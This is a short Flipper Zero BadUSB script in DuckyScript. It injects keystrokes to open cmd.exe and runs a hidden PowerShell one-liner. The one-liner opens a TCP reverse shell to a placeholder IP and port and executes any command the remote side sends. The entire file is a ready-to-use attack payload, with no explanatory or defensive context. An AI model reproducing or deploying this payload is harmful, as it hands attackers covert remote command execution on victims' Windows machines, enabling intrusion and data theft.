REM Reverse Shell Initiator for Flipper Zero
DELAY 2000
REM Open cmd.exe
GUI r
DELAY 500
STRING cmd.exe
ENTER
DELAY 1000
REM Execute PowerShell reverse shell command
STRING powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER
